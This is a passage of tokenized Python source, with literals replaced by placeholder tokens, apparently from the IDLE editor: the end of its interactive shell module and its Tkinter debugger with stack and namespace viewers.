"<STR_LIT>" ) and <EOL> self . text . compare ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) : <EOL> return <EOL> if not self . executing : <EOL> self . resetoutput ( ) <EOL> self . close ( ) <EOL> else : <EOL> self . canceled = <NUM_LIT:0> <EOL> self . endoffile = <NUM_LIT:1> <EOL> self . top . quit ( ) <EOL> return "<STR_LIT>" <EOL> def linefeed_callback ( self , event ) : <EOL> if self . reading : <EOL> self . text . insert ( "<STR_LIT>" , "<STR_LIT:\n>" ) <EOL> self . text . see ( "<STR_LIT>" ) <EOL> else : <EOL> self . newline_and_indent_event ( event ) <EOL> return "<STR_LIT>" <EOL> def enter_callback ( self , event ) : <EOL> if self . executing and not self . reading : <EOL> return <EOL> try : <EOL> sel = self . text . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if sel : <EOL> if self . text . compare ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> self . recall ( sel , event ) <EOL> return "<STR_LIT>" <EOL> except : <EOL> pass <EOL> if self . text . compare ( "<STR_LIT>" , "<STR_LIT:<>" , "<STR_LIT>" ) : <EOL> prev = self . text . tag_prevrange ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if prev and self . text . compare ( "<STR_LIT>" , "<STR_LIT:<>" , prev [ <NUM_LIT:1> ] ) : <EOL> self . recall ( self . text . get ( prev [ <NUM_LIT:0> ] , prev [ <NUM_LIT:1> ] ) , event ) <EOL> return "<STR_LIT>" <EOL> next = self . text . tag_nextrange ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if next and self . text . compare ( "<STR_LIT>" , "<STR_LIT>" , next [ <NUM_LIT:0> ] ) : <EOL> self . recall ( self . text . get ( next [ <NUM_LIT:0> ] , next [ <NUM_LIT:1> ] ) , event ) <EOL> return "<STR_LIT>" <EOL> indices = self . text . tag_nextrange ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if indices and self . text . compare ( indices [ <NUM_LIT:0> ] , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> self . recall ( self . text . get ( indices [ <NUM_LIT:1> ] , "<STR_LIT>" ) , event ) <EOL> else : <EOL> self . recall ( self . text . get ( "<STR_LIT>" , "<STR_LIT>" ) , event ) <EOL> return "<STR_LIT>" <EOL> if self . text . compare ( "<STR_LIT>" , "<STR_LIT:<>" , "<STR_LIT>" ) : <EOL> self . text . mark_set ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> s = self . text . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if s and not s . strip ( ) : <EOL> self . text . delete ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if self . text . compare ( "<STR_LIT>" , "<STR_LIT:<>" , "<STR_LIT>" ) : <EOL> self . newline_and_indent_event ( event ) <EOL> return "<STR_LIT>" <EOL> self . text . mark_set ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if self . reading : <EOL> self . text . insert ( "<STR_LIT>" , "<STR_LIT:\n>" ) <EOL> self . text . see ( "<STR_LIT>" ) <EOL> else : <EOL> self . newline_and_indent_event ( event ) <EOL> self . text . tag_add ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . text . update_idletasks ( ) <EOL> if self . reading : <EOL> self . top . quit ( ) <EOL> else : <EOL> self . runit ( ) <EOL> return "<STR_LIT>" <EOL> def recall ( self , s , event ) : <EOL> s = re . sub ( r'<STR_LIT>' , '<STR_LIT>' , s ) <EOL> s = re . sub ( r'<STR_LIT>' , '<STR_LIT>' , s ) <EOL> lines = s . split ( '<STR_LIT:\n>' ) <EOL> self . text . undo_block_start ( ) <EOL> try : <EOL> self . text . tag_remove ( "<STR_LIT>" , "<STR_LIT:1.0>" , "<STR_LIT:end>" ) <EOL> self . text . mark_set ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> prefix = self . text . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if prefix . rstrip ( ) . endswith ( '<STR_LIT::>' ) : <EOL> self . newline_and_indent_event ( event ) <EOL> prefix = self . text . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . text . insert ( "<STR_LIT>" , lines [ <NUM_LIT:0> ] . strip ( ) ) <EOL> if len ( lines ) > <NUM_LIT:1> : <EOL> orig_base_indent = re . search ( r'<STR_LIT>' , lines [ <NUM_LIT:0> ] ) . group ( <NUM_LIT:0> ) <EOL> new_base_indent = re . search ( r'<STR_LIT>' , prefix ) . group ( <NUM_LIT:0> ) <EOL> for line in lines [ <NUM_LIT:1> : ] : <EOL> if line . startswith ( orig_base_indent ) : <EOL> line = new_base_indent + line [ len ( orig_base_indent ) : ] <EOL> self . text . insert ( '<STR_LIT>' , '<STR_LIT:\n>' + line . rstrip ( ) ) <EOL> finally : <EOL> self . text . see ( "<STR_LIT>" ) <EOL> self . text . undo_block_stop ( ) <EOL> def runit ( self ) : <EOL> line = self . text . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> i = len ( line ) <EOL> while i > <NUM_LIT:0> and line [ i - <NUM_LIT:1> ] in "<STR_LIT>" : <EOL> i = i - <NUM_LIT:1> <EOL> if i > <NUM_LIT:0> and line [ i - <NUM_LIT:1> ] == "<STR_LIT:\n>" : <EOL> i = i - <NUM_LIT:1> <EOL> while i > <NUM_LIT:0> and line [ i - <NUM_LIT:1> ] in "<STR_LIT>" : <EOL> i = i - <NUM_LIT:1> <EOL> line = line [ : i ] <EOL> more = self . interp . runsource ( line ) <EOL> def open_stack_viewer ( self , event = None ) : <EOL> if self . interp . rpcclt : <EOL> return self . interp . remote_stack_viewer ( ) <EOL> try : <EOL> sys . last_traceback <EOL> except : <EOL> tkMessageBox . showerror ( "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> master = self . text ) <EOL> return <EOL> from StackViewer import StackBrowser <EOL> sv = StackBrowser ( self . root , self . flist ) <EOL> def view_restart_mark ( self , event = None ) : <EOL> text = self . text <EOL> text . see ( "<STR_LIT>" ) <EOL> ranges = text . tag_ranges ( "<STR_LIT>" ) <EOL> if not ranges : <EOL> return <EOL> restart_line = self . interp . get_restart_line ( ) <EOL> for indx in range ( len ( ranges ) , <NUM_LIT:0> , - <NUM_LIT:2> ) : <EOL> lineno = '<STR_LIT>' % str ( ranges [ indx - <NUM_LIT:1> ] ) . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] <EOL> start , end = ( '<STR_LIT>' % lineno , '<STR_LIT>' % lineno ) <EOL> content = text . get ( start , end ) [ <NUM_LIT:4> : ] . rstrip ( ) <EOL> if content and content [ : - <NUM_LIT:2> ] != restart_line : <EOL> break <EOL> text . see ( lineno ) <EOL> def restart_shell ( self , event = None ) : <EOL> self . stderr . signaled = False <EOL> self . interp . restart_subprocess ( ) <EOL> def showprompt ( self ) : <EOL> self . resetoutput ( ) <EOL> try : <EOL> s = str ( sys . ps1 ) <EOL> except : <EOL> s = "<STR_LIT>" <EOL> self . console . write ( s ) <EOL> self . text . mark_set ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . set_line_and_column ( ) <EOL> self . io . reset_undo ( ) <EOL> def resetoutput ( self ) : <EOL> source = self . text . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if self . history : <EOL> self . history . history_store ( source ) <EOL> if self . text . get ( "<STR_LIT>" ) != "<STR_LIT:\n>" : <EOL> self . text . insert ( "<STR_LIT>" , "<STR_LIT:\n>" ) <EOL> self . text . mark_set ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . set_line_and_column ( ) <EOL> sys . stdout . softspace = <NUM_LIT:0> <EOL> def write ( self , s , tags = ( ) ) : <EOL> try : <EOL> self . text . mark_gravity ( "<STR_LIT>" , "<STR_LIT:right>" ) <EOL> OutputWindow . write ( self , s , tags , "<STR_LIT>" ) <EOL> self . text . mark_gravity ( "<STR_LIT>" , "<STR_LIT:left>" ) <EOL> except : <EOL> pass <EOL> if self . canceled : <EOL> self . canceled = <NUM_LIT:0> <EOL> if not use_subprocess : <EOL> raise KeyboardInterrupt <EOL> class PseudoFile ( object ) : <EOL> def __init__ ( self , shell , tags , encoding = None ) : <EOL> self . shell = shell <EOL> self . tags = tags <EOL> self . softspace = <NUM_LIT:0> <EOL> self . encoding = encoding <EOL> def write ( self , s ) : <EOL> self . shell . write ( s , self . tags ) <EOL> def writelines ( self , l ) : <EOL> map ( self . write , l ) <EOL> def flush ( self ) : <EOL> pass <EOL> def isatty ( self ) : <EOL> return True <EOL> class PseudoStderrFile ( PseudoFile ) : <EOL> def __init__ ( self , shell , tags = "<STR_LIT>" , encoding = None ) : <EOL> PseudoFile . __init__ ( self , shell , tags , encoding ) <EOL> self . signaled = False <EOL> def write ( self , s ) : <EOL> if not self . signaled : <EOL> signal_err = idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , default = <NUM_LIT:1> , type = '<STR_LIT:bool>' ) <EOL> if signal_err : <EOL> self . shell . top . wakeup ( anystate = True ) <EOL> self . signaled = True <EOL> PseudoFile . write ( self , s ) <EOL> usage_msg = """<STR_LIT>""" <EOL> def main ( ) : <EOL> global flist , root , use_subprocess <EOL> use_subprocess = True <EOL> enable_shell = False <EOL> enable_edit = False <EOL> debug = False <EOL> cmd = None <EOL> script = None <EOL> startup = False <EOL> try : <EOL> opts , args = getopt . getopt ( sys . argv [ <NUM_LIT:1> : ] , "<STR_LIT>" ) <EOL> except getopt . error , msg : <EOL> sys . stderr . write ( "<STR_LIT>" % str ( msg ) ) <EOL> sys . stderr . write ( usage_msg ) <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> for o , a in opts : <EOL> if o == '<STR_LIT:-c>' : <EOL> cmd = a <EOL> enable_shell = True <EOL> if o == '<STR_LIT>' : <EOL> debug = True <EOL> enable_shell = True <EOL> if o == '<STR_LIT>' : <EOL> enable_edit = True <EOL> if o == '<STR_LIT>' : <EOL> sys . stdout . write ( usage_msg ) <EOL> sys . exit ( ) <EOL> if o == '<STR_LIT>' : <EOL> enable_shell = True <EOL> if o == '<STR_LIT>' : <EOL> use_subprocess = False <EOL> if o == '<STR_LIT>' : <EOL> script = a <EOL> if os . path . isfile ( script ) : <EOL> pass <EOL> else : <EOL> print "<STR_LIT>" , script <EOL> sys . exit ( ) <EOL> enable_shell = True <EOL> if o == '<STR_LIT>' : <EOL> startup = True <EOL> enable_shell = True <EOL> if o == '<STR_LIT>' : <EOL> PyShell . shell_title = a <EOL> enable_shell = True <EOL> if args and args [ <NUM_LIT:0> ] == '<STR_LIT:->' : <EOL> cmd = sys . stdin . read ( ) <EOL> enable_shell = True <EOL> for i in range ( len ( sys . path ) ) : <EOL> sys . path [ i ] = os . path . abspath ( sys . path [ i ] ) <EOL> if args and args [ <NUM_LIT:0> ] == '<STR_LIT:->' : <EOL> sys . argv = [ '<STR_LIT>' ] + args [ <NUM_LIT:1> : ] <EOL> elif cmd : <EOL> sys . argv = [ '<STR_LIT:-c>' ] + args <EOL> elif script : <EOL> sys . argv = [ script ] + args <EOL> elif args : <EOL> enable_edit = True <EOL> pathx = [ ] <EOL> for filename in args : <EOL> pathx . append ( os . path . dirname ( filename ) ) <EOL> for dir in pathx : <EOL> dir = os . path . abspath ( dir ) <EOL> if not dir in sys . path : <EOL> sys . path . insert ( <NUM_LIT:0> , dir ) <EOL> else : <EOL> dir = os . getcwd ( ) <EOL> if not dir in sys . path : <EOL> sys . path . insert ( <NUM_LIT:0> , dir ) <EOL> edit_start = idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , type = '<STR_LIT:bool>' ) <EOL> enable_edit = enable_edit or edit_start <EOL> enable_shell = enable_shell or not edit_start <EOL> root = Tk ( className = "<STR_LIT>" ) <EOL> fixwordbreaks ( root ) <EOL> root . withdraw ( ) <EOL> flist = PyShellFileList ( root ) <EOL> macosxSupport . setupApp ( root , flist ) <EOL> if enable_edit : <EOL> if not ( cmd or script ) : <EOL> for filename in args : <EOL> flist . open ( filename ) <EOL> if not args : <EOL> flist . new ( ) <EOL> if enable_shell : <EOL> shell = flist . open_shell ( ) <EOL> if not shell : <EOL> return <EOL> if macosxSupport . runningAsOSXApp ( ) and flist . dict : <EOL> shell . top . lower ( ) <EOL> shell = flist . pyshell <EOL> if debug : <EOL> shell . open_debugger ( ) <EOL> if startup : <EOL> filename = os . environ . get ( "<STR_LIT>" ) or os . environ . get ( "<STR_LIT>" ) <EOL> if filename and os . path . isfile ( filename ) : <EOL> shell . interp . execfile ( filename ) <EOL> if shell and cmd or script : <EOL> shell . interp . runcommand ( """<STR_LIT>""" % ( sys . argv , ) ) <EOL> if cmd : <EOL> shell . interp . execsource ( cmd ) <EOL> elif script : <EOL> shell . interp . prepend_syspath ( script ) <EOL> shell . interp . execfile ( script ) <EOL> root . mainloop ( ) <EOL> root . destroy ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . modules [ '<STR_LIT>' ] = sys . modules [ '<STR_LIT:__main__>' ] <EOL> main ( ) </s>
<s> import os <EOL> import bdb <EOL> import types <EOL> from tkinter import * <EOL> from . WindowList import ListedToplevel <EOL> from . ScrolledList import ScrolledList <EOL> from . import macosxSupport <EOL> class Idb ( bdb . Bdb ) : <EOL> def __init__ ( self , gui ) : <EOL> self . gui = gui <EOL> bdb . Bdb . __init__ ( self ) <EOL> def user_line ( self , frame ) : <EOL> if self . in_rpc_code ( frame ) : <EOL> self . set_step ( ) <EOL> return <EOL> message = self . __frame2message ( frame ) <EOL> self . gui . interaction ( message , frame ) <EOL> def user_exception ( self , frame , info ) : <EOL> if self . in_rpc_code ( frame ) : <EOL> self . set_step ( ) <EOL> return <EOL> message = self . __frame2message ( frame ) <EOL> self . gui . interaction ( message , frame , info ) <EOL> def in_rpc_code ( self , frame ) : <EOL> if frame . f_code . co_filename . count ( '<STR_LIT>' ) : <EOL> return True <EOL> else : <EOL> prev_frame = frame . f_back <EOL> if prev_frame . f_code . co_filename . count ( '<STR_LIT>' ) : <EOL> return False <EOL> return self . in_rpc_code ( prev_frame ) <EOL> def __frame2message ( self , frame ) : <EOL> code = frame . f_code <EOL> filename = code . co_filename <EOL> lineno = frame . f_lineno <EOL> basename = os . path . basename ( filename ) <EOL> message = "<STR_LIT>" % ( basename , lineno ) <EOL> if code . co_name != "<STR_LIT:?>" : <EOL> message = "<STR_LIT>" % ( message , code . co_name ) <EOL> return message <EOL> class Debugger : <EOL> vstack = vsource = vlocals = vglobals = None <EOL> def __init__ ( self , pyshell , idb = None ) : <EOL> if idb is None : <EOL> idb = Idb ( self ) <EOL> self . pyshell = pyshell <EOL> self . idb = idb <EOL> self . frame = None <EOL> self . make_gui ( ) <EOL> self . interacting = <NUM_LIT:0> <EOL> def run ( self , * args ) : <EOL> try : <EOL> self . interacting = <NUM_LIT:1> <EOL> return self . idb . run ( * args ) <EOL> finally : <EOL> self . interacting = <NUM_LIT:0> <EOL> def close ( self , event = None ) : <EOL> if self . interacting : <EOL> self . top . bell ( ) <EOL> return <EOL> if self . stackviewer : <EOL> self . stackviewer . close ( ) ; self . stackviewer = None <EOL> self . pyshell . close_debugger ( ) <EOL> self . top . destroy ( ) <EOL> def make_gui ( self ) : <EOL> pyshell = self . pyshell <EOL> self . flist = pyshell . flist <EOL> self . root = root = pyshell . root <EOL> self . top = top = ListedToplevel ( root ) <EOL> self . top . wm_title ( "<STR_LIT>" ) <EOL> self . top . wm_iconname ( "<STR_LIT>" ) <EOL> top . wm_protocol ( "<STR_LIT>" , self . close ) <EOL> self . top . bind ( "<STR_LIT>" , self . close ) <EOL> self . bframe = bframe = Frame ( top ) <EOL> self . bframe . pack ( anchor = "<STR_LIT:w>" ) <EOL> self . buttons = bl = [ ] <EOL> self . bcont = b = Button ( bframe , text = "<STR_LIT>" , command = self . cont ) <EOL> bl . append ( b ) <EOL> self . bstep = b = Button ( bframe , text = "<STR_LIT>" , command = self . step ) <EOL> bl . append ( b ) <EOL> self . bnext = b = Button ( bframe , text = "<STR_LIT>" , command = self . next ) <EOL> bl . append ( b ) <EOL> self . bret = b = Button ( bframe , text = "<STR_LIT>" , command = self . ret ) <EOL> bl . append ( b ) <EOL> self . bret = b = Button ( bframe , text = "<STR_LIT>" , command = self . quit ) <EOL> bl . append ( b ) <EOL> for b in bl : <EOL> b . configure ( state = "<STR_LIT>" ) <EOL> b . pack ( side = "<STR_LIT:left>" ) <EOL> self . cframe = cframe = Frame ( bframe ) <EOL> self . cframe . pack ( side = "<STR_LIT:left>" ) <EOL> if not self . vstack : <EOL> self . __class__ . vstack = BooleanVar ( top ) <EOL> self . vstack . set ( <NUM_LIT:1> ) <EOL> self . bstack = Checkbutton ( cframe , <EOL> text = "<STR_LIT>" , command = self . show_stack , variable = self . vstack ) <EOL> self . bstack . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> ) <EOL> if not self . vsource : <EOL> self . __class__ . vsource = BooleanVar ( top ) <EOL> self . bsource = Checkbutton ( cframe , <EOL> text = "<STR_LIT>" , command = self . show_source , variable = self . vsource ) <EOL> self . bsource . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> ) <EOL> if not self . vlocals : <EOL> self . __class__ . vlocals = BooleanVar ( top ) <EOL> self . vlocals . set ( <NUM_LIT:1> ) <EOL> self . blocals = Checkbutton ( cframe , <EOL> text = "<STR_LIT>" , command = self . show_locals , variable = self . vlocals ) <EOL> self . blocals . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:0> ) <EOL> if not self . vglobals : <EOL> self . __class__ . vglobals = BooleanVar ( top ) <EOL> self . bglobals = Checkbutton ( cframe , <EOL> text = "<STR_LIT>" , command = self . show_globals , variable = self . vglobals ) <EOL> self . bglobals . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:1> ) <EOL> self . status = Label ( top , anchor = "<STR_LIT:w>" ) <EOL> self . status . pack ( anchor = "<STR_LIT:w>" ) <EOL> self . error = Label ( top , anchor = "<STR_LIT:w>" ) <EOL> self . error . pack ( anchor = "<STR_LIT:w>" , fill = "<STR_LIT:x>" ) <EOL> self . errorbg = self . error . cget ( "<STR_LIT>" ) <EOL> self . fstack = Frame ( top , height = <NUM_LIT:1> ) <EOL> self . fstack . pack ( expand = <NUM_LIT:1> , fill = "<STR_LIT>" ) <EOL> self . flocals = Frame ( top ) <EOL> self . flocals . pack ( expand = <NUM_LIT:1> , fill = "<STR_LIT>" ) <EOL> self . fglobals = Frame ( top , height = <NUM_LIT:1> ) <EOL> self . fglobals . pack ( expand = <NUM_LIT:1> , fill = "<STR_LIT>" ) <EOL> if self . vstack . get ( ) : <EOL> self . show_stack ( ) <EOL> if self . vlocals . get ( ) : <EOL> self . show_locals ( ) <EOL> if self . vglobals . get ( ) : <EOL> self . show_globals ( ) <EOL> def interaction ( self , message , frame , info = None ) : <EOL> self . frame = frame <EOL> self . status . configure ( text = message ) <EOL> if info : <EOL> type , value , tb = info <EOL> try : <EOL> m1 = type . __name__ <EOL> except AttributeError : <EOL> m1 = "<STR_LIT:%s>" % str ( type ) <EOL> if value is not None : <EOL> try : <EOL> m1 = "<STR_LIT>" % ( m1 , str ( value ) ) <EOL> except : <EOL> pass <EOL> bg = "<STR_LIT>" <EOL> else : <EOL> m1 = "<STR_LIT>" <EOL> tb = None <EOL> bg = self . errorbg <EOL> self . error . configure ( text = m1 , background = bg ) <EOL> sv = self . stackviewer <EOL> if sv : <EOL> stack , i = self . idb . get_stack ( self . frame , tb ) <EOL> sv . load_stack ( stack , i ) <EOL> self . show_variables ( <NUM_LIT:1> ) <EOL> if self . vsource . get ( ) : <EOL> self . sync_source_line ( ) <EOL> for b in self . buttons : <EOL> b . configure ( state = "<STR_LIT>" ) <EOL> self . top . wakeup ( ) <EOL> self . root . mainloop ( ) <EOL> for b in self . buttons : <EOL> b . configure ( state = "<STR_LIT>" ) <EOL> self . status . configure ( text = "<STR_LIT>" ) <EOL> self . error . configure ( text = "<STR_LIT>" , background = self . errorbg ) <EOL> self . frame = None <EOL> def sync_source_line ( self ) : <EOL> frame = self . frame <EOL> if not frame : <EOL> return <EOL> filename , lineno = self . __frame2fileline ( frame ) <EOL> if filename [ : <NUM_LIT:1> ] + filename [ - <NUM_LIT:1> : ] != "<STR_LIT>" and os . path . exists ( filename ) : <EOL> self . flist . gotofileline ( filename , lineno ) <EOL> def __frame2fileline ( self , frame ) : <EOL> code = frame . f_code <EOL> filename = code . co_filename <EOL> lineno = frame . f_lineno <EOL> return filename , lineno <EOL> def cont ( self ) : <EOL> self . idb . set_continue ( ) <EOL> self . root . quit ( ) <EOL> def step ( self ) : <EOL> self . idb . set_step ( ) <EOL> self . root . quit ( ) <EOL> def next ( self ) : <EOL> self . idb . set_next ( self . frame ) <EOL> self . root . quit ( ) <EOL> def ret ( self ) : <EOL> self . idb . set_return ( self . frame ) <EOL> self . root . quit ( ) <EOL> def quit ( self ) : <EOL> self . idb . set_quit ( ) <EOL> self . root . quit ( ) <EOL> stackviewer = None <EOL> def show_stack ( self ) : <EOL> if not self . stackviewer and self . vstack . get ( ) : <EOL> self . stackviewer = sv = StackViewer ( self . fstack , self . flist , self ) <EOL> if self . frame : <EOL> stack , i = self . idb . get_stack ( self . frame , None ) <EOL> sv . load_stack ( stack , i ) <EOL> else : <EOL> sv = self . stackviewer <EOL> if sv and not self . vstack . get ( ) : <EOL> self . stackviewer = None <EOL> sv . close ( ) <EOL> self . fstack [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> def show_source ( self ) : <EOL> if self . vsource . get ( ) : <EOL> self . sync_source_line ( ) <EOL> def show_frame ( self , stackitem ) : <EOL> frame , lineno = stackitem <EOL> self . frame = frame <EOL> self . show_variables ( ) <EOL> localsviewer = None <EOL> globalsviewer = None <EOL> def show_locals ( self ) : <EOL> lv = self . localsviewer <EOL> if self . vlocals . get ( ) : <EOL> if not lv : <EOL> self . localsviewer = NamespaceViewer ( self . flocals , "<STR_LIT>" ) <EOL> else : <EOL> if lv : <EOL> self . localsviewer = None <EOL> lv . close ( ) <EOL> self . flocals [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> self . show_variables ( ) <EOL> def show_globals ( self ) : <EOL> gv = self . globalsviewer <EOL> if self . vglobals . get ( ) : <EOL> if not gv : <EOL> self . globalsviewer = NamespaceViewer ( self . fglobals , "<STR_LIT>" ) <EOL> else : <EOL> if gv : <EOL> self . globalsviewer = None <EOL> gv . close ( ) <EOL> self . fglobals [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> self . show_variables ( ) <EOL> def show_variables ( self , force = <NUM_LIT:0> ) : <EOL> lv = self . localsviewer <EOL> gv = self . globalsviewer <EOL> frame = self . frame <EOL> if not frame : <EOL> ldict = gdict = None <EOL> else : <EOL> ldict = frame . f_locals <EOL> gdict = frame . f_globals <EOL> if lv and gv and ldict is gdict : <EOL> ldict = None <EOL> if lv : <EOL> lv . load_dict ( ldict , force , self . pyshell . interp . rpcclt ) <EOL> if gv : <EOL> gv . load_dict ( gdict , force , self . pyshell . interp . rpcclt ) <EOL> def set_breakpoint_here ( self , filename , lineno ) : <EOL> self . idb . set_break ( filename , lineno ) <EOL> def clear_breakpoint_here ( self , filename , lineno ) : <EOL> self . idb . clear_break ( filename , lineno ) <EOL> def clear_file_breaks ( self , filename ) : <EOL> self . idb . clear_all_file_breaks ( filename ) <EOL> def load_breakpoints ( self ) : <EOL> "<STR_LIT>" <EOL> for editwin in self . pyshell . flist . inversedict : <EOL> filename = editwin . io . filename <EOL> try : <EOL> for lineno in editwin . breakpoints : <EOL> self . set_breakpoint_here ( filename , lineno ) <EOL> except AttributeError : <EOL> continue <EOL> class StackViewer ( ScrolledList ) : <EOL> def __init__ ( self , master , flist , gui ) : <EOL> if macosxSupport . runningAsOSXApp ( ) : <EOL> ScrolledList . __init__ ( self , master ) <EOL> else : <EOL> ScrolledList . __init__ ( self , master , width = <NUM_LIT> ) <EOL> self . flist = flist <EOL> self . gui = gui <EOL> self . stack = [ ] <EOL> def load_stack ( self , stack , index = None ) : <EOL> self . stack = stack <EOL> self . clear ( ) <EOL> for i in range ( len ( stack ) ) : <EOL> frame , lineno = stack [ i ] <EOL> try : <EOL> modname = frame . f_globals [ "<STR_LIT>" ] <EOL> except : <EOL> modname = "<STR_LIT:?>" <EOL> code = frame . f_code <EOL> filename = code . co_filename <EOL> funcname = code . co_name <EOL> import linecache <EOL> sourceline = linecache . getline ( filename , lineno ) <EOL> sourceline = sourceline . strip ( ) <EOL> if funcname in ( "<STR_LIT:?>" , "<STR_LIT>" , None ) : <EOL> item = "<STR_LIT>" % ( modname , lineno , sourceline ) <EOL> else : <EOL> item = "<STR_LIT>" % ( modname , funcname , <EOL> lineno , sourceline ) <EOL> if i == index : <EOL> item = "<STR_LIT>" + item <EOL> self . append ( item ) <EOL> if index is not None : <EOL> self . select ( index ) <EOL> def popup_event ( self , event ) : <EOL> "<STR_LIT>" <EOL> if self . stack : <EOL> return ScrolledList . popup_event ( self , event ) <EOL> def fill_menu ( self ) : <EOL> "<STR_LIT>" <EOL> menu = self . menu <EOL> menu . add_command ( label = "<STR_LIT>" , <EOL> command = self . goto_source_line ) <EOL> menu . add_command ( label = "<STR_LIT>" , <EOL> command = self . show_stack_frame ) <EOL> def on_select ( self , index ) : <EOL> "<STR_LIT>" <EOL> if <NUM_LIT:0> <= index < len ( self . stack ) : <EOL> self . gui . show_frame ( self . stack [ index ] ) <EOL> def on_double ( self , index ) : <EOL> "<STR_LIT>" <EOL> self . show_source ( index ) <EOL> def goto_source_line ( self ) : <EOL> index = self . listbox . index ( "<STR_LIT>" ) <EOL> self . show_source ( index ) <EOL> def show_stack_frame ( self ) : <EOL> index = self . listbox . index ( "<STR_LIT>" ) <EOL> if <NUM_LIT:0> <= index < len ( self . stack ) : <EOL> self . gui . show_frame ( self . stack [ index ] ) <EOL> def show_source ( self , index ) : <EOL> if not ( <NUM_LIT:0> <= index < len ( self . stack ) ) : <EOL> return <EOL> frame , lineno = self . stack [ index ] <EOL> code = frame . f_code <EOL> filename = code . co_filename <EOL> if os . path . isfile ( filename ) : <EOL> edit = self . flist . open ( filename ) <EOL> if edit : <EOL> edit . gotoline ( lineno ) <EOL> class NamespaceViewer : <EOL> def __init__ ( self , master , title , dict = None ) : <EOL> width = <NUM_LIT:0> <EOL> height = <NUM_LIT> <EOL> if dict : <EOL> height = <NUM_LIT:20> * len ( dict ) <EOL> self . master = master <EOL> self . title = title <EOL> import reprlib <EOL> self . repr = reprlib . Repr ( ) <EOL> self . repr . maxstring = <NUM_LIT> <EOL> self . repr . maxother = <NUM_LIT> <EOL> self . frame = frame = Frame ( master ) <EOL> self . frame . pack ( expand = <NUM_LIT:1> , fill = "<STR_LIT>" ) <EOL> self . label = Label ( frame , text = title , borderwidth = <NUM_LIT:2> , relief = "<STR_LIT>" ) <EOL> self . label . pack ( fill = "<STR_LIT:x>" ) <EOL> self . vbar = vbar = Scrollbar ( frame , name = "<STR_LIT>" ) <EOL> vbar . pack ( side = "<STR_LIT:right>" , fill = "<STR_LIT:y>" ) <EOL> self . canvas = canvas = Canvas ( frame , <EOL> height = min ( <NUM_LIT> , max ( <NUM_LIT> , height ) ) , <EOL> scrollregion = ( <NUM_LIT:0> , <NUM_LIT:0> , width , height ) ) <EOL> canvas . pack ( side = "<STR_LIT:left>" , fill = "<STR_LIT>" , expand = <NUM_LIT:1> ) <EOL> vbar [ "<STR_LIT>" ] = canvas . yview <EOL> canvas [ "<STR_LIT>" ] = vbar . set <EOL> self . subframe = subframe = Frame ( canvas ) <EOL> self . sfid = canvas . create_window ( <NUM_LIT:0> , <NUM_LIT:0> , window = subframe , anchor = "<STR_LIT>" ) <EOL> self . load_dict ( dict ) <EOL> dict = - <NUM_LIT:1> <EOL> def load_dict ( self , dict , force = <NUM_LIT:0> , rpc_client = None ) : <EOL> if dict is self . dict and not force : <EOL> return <EOL> subframe = self . subframe <EOL> frame = self . frame <EOL> for c in list ( subframe . children . values ( ) ) : <EOL> c . destroy ( ) <EOL> self . dict = None <EOL> if not dict : <EOL> l = Label ( subframe , text = "<STR_LIT:None>" ) <EOL> l . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> ) <EOL> else : <EOL> keys_list = dict . keys ( ) <EOL> names = sorted ( keys_list ) <EOL> row = <NUM_LIT:0> <EOL> for name in names : <EOL> value = dict [ name ] <EOL> svalue = self . repr . repr ( value ) <EOL> if rpc_client : <EOL> svalue = svalue [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> l = Label ( subframe , text = name ) <EOL> l . grid ( row = row , column = <NUM_LIT:0> , sticky = "<STR_LIT>" ) <EOL> l = Entry ( subframe , width = <NUM_LIT:0> , borderwidth = <NUM_LIT:0> ) <EOL> l . insert ( <NUM_LIT:0> , svalue ) <EOL> l . grid ( row = row , column = <NUM_LIT:1> , sticky = "<STR_LIT>" ) <EOL> row = row + <NUM_LIT:1> <EOL> self . dict = dict <EOL> subframe . update_idletasks ( ) <EOL> width = subframe . winfo_reqwidth ( ) <EOL> height = subframe . winfo_reqheight ( ) <EOL> canvas = self . canvas <EOL> self . canvas [ "<STR_LIT>" ] = ( <NUM_LIT:0> , <NUM_LIT:0> , width , height ) <EOL> if height > <NUM_LIT> : <EOL> canvas [ "<STR_LIT>" ] = <NUM_LIT> <EOL> frame . pack ( expand = <NUM_LIT:1> ) <EOL> else : <EOL> canvas [ "<STR_LIT>" ] = height <EOL> frame . pack ( expand = <NUM_LIT:0> ) <EOL> def close ( self ) : <EOL> self . frame . destroy ( ) </s>
